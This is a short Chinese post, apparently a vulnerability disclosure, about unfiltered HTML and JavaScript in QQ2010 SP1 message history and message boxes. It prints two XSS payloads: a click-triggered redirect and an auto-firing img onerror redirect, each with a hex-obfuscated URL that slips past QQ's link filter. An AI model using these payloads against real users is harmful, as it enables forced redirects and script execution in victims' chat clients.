最近杯具了。最近才发布的QQ2010正式版SP1,目前还在部分测试就开始出现漏洞了。
首先囧一下:脚本出错还会提示错误
1、消息记录的Javascript、Html标签没有屏蔽
2、消息盒子Javascript、Html标签没有屏蔽
3、小实验
1、发送代码:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex6fx69x63x71x7Ax69x6Ex65x2ex63x6fx6d’" />
这个会出现网页。因为腾讯会自动将url转换,我们必须混淆url才能发送
4、超牛代码
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex6fx69x63x71x7Ax69x6Ex65x2ex63x6fx6d’"/>
因为上面那段需要点击才能触发,想到一个不用点击就能触发的代码。
5、希望腾讯快点修复,这个漏洞非同小可。
临时解决方案:使用QQ2010正式版。